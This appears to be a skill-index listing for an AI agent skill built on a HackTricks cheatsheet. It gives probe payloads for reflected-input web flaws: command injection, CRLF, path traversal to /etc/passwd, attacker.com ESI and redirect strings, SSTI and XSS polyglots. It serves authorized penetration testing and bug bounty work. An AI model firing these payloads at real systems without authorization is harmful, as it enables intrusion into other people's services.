OpenSkillIndex← back to search

Hacktricks-skills pentest-reflection-pocs

Web security testing cheatsheet for reflected input vulnerabilities. Use this skill whenever you're doing web penetration testing, security assessments, or bug bounty hunting and need to test for vulnerabilities where user input is reflected in responses. Trigger this when you mention: reflected parameters, input reflection, web vulnerability testing, XSS, SSTI, command injection, path traversal, open redirect, SSRF, CRLF injection, or any web security testing scenario where you need quick PoC payloads.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/pocs-and-polygloths-cheatsheet/pocs-and-polygloths-cheatsheet/SKILL.MD
source content

Web Reflection PoCs & Polyglots Cheatsheet

This skill provides quick reference payloads for testing vulnerabilities when user input is reflected in the response. Use these to rapidly identify exploitable weaknesses during web security assessments.

⚠️ Important: These are basic tests, not comprehensive coverage. Use as a starting point and expand based on findings.

📋 Scope: Focuses on reflection-based vulnerabilities. Does NOT include Content-Type dependent injections (XXE) or database-specific injections.

When to Use These Tests

Use these payloads when you observe:

  • User input appearing in HTTP responses
  • Reflected parameters in URLs, forms, or headers
  • Dynamic content that echoes user data
  • Any scenario where attacker-controlled data flows to output

Quick Reference by Vulnerability Type

1. Client-Side Template Injection (CSTI)

Basic Tests:

{{7*7}}
[7*7]

Polyglot:

{{7*7}}[7*7]

What to look for: If you see 

49
in the response, template injection is likely present.

2. Command Injection

Basic Tests:

;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)

Polyglot:

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

What to look for: Delays in response (sleep), file listings, or command output.

3. CRLF Injection

Basic Tests:

%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

What to look for: HTTP response splitting, header injection, or ability to inject custom headers.

4. Dangling Markup

Basic Tests:

<br><b><h1>THIS IS AN INJECTED TITLE </h1>

What to look for: HTML structure changes, unexpected rendering, or layout shifts.

5. File Inclusion / Path Traversal

Basic Tests:

/etc/passwd
../../../../../../etc/hosts
..\\..\\..\\..\\..\\..\\..\\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\\..\\..\\..\\..\\..\\..\\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\\\asdasdasdasd.burpcollab.com/mal.php

What to look for: File contents, system files, or out-of-band callbacks to your server.

6. Open Redirect / SSRF

Basic Tests:

www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)

What to look for: Redirects to attacker-controlled domains or internal network access.

7. ReDoS (Regular Expression Denial of Service)

Basic Tests:

(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$

What to look for: Slow responses, timeouts, or server resource exhaustion.

8. Server-Side Inclusion / ESI

Basic Tests:

<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Polyglot:

<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

What to look for: Server-side execution, file inclusion, or ESI processing.

9. Server-Side Template Injection (SSTI)

Basic Tests:

${{<%[%'"}}%
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Polyglot:

{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%

What to look for: If you see 

49
in the response, SSTI is likely present. Different template engines use different syntaxes.

10. XSLT Server-Side Injection

Basic Tests:

<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

Polyglot:

<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

What to look for: XSLT version numbers or external stylesheet processing.

11. XSS (Cross-Site Scripting)

Basic Tests:

" onclick=alert() a="
'><img src=x onerror=alert(1) />
javascript:alert()

Polyglots:

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"<img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>''><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

What to look for: JavaScript execution, alert boxes, or script tags being rendered.

Testing Workflow

  1. Identify reflection points - Find where user input appears in responses
  2. Start with basic tests - Use simple payloads first to confirm reflection
  3. Try polyglots - If basic tests work, polyglots may bypass filters
  4. Check for OOB - Use burpcollab or similar for out-of-band detection
  5. Document findings - Note which payloads worked and response characteristics

Safety Notes

  • Authorization: Only test systems you have explicit permission to assess
  • Rate limiting: Be mindful of request rates to avoid DoS
  • Data handling: Some payloads may trigger logging or alerting systems
  • Production caution: Sleep commands and resource-intensive tests can impact live systems

Next Steps After Finding Vulnerabilities

Once you identify a vulnerability:

  1. Confirm it's exploitable with controlled payloads
  2. Assess impact and scope
  3. Document with evidence (screenshots, request/response pairs)
  4. Consider safe exploitation for proof-of-concept
  5. Prepare remediation recommendations

This cheatsheet is based on the HackTricks pentesting methodology. For comprehensive testing, refer to full vulnerability documentation and use professional security tools.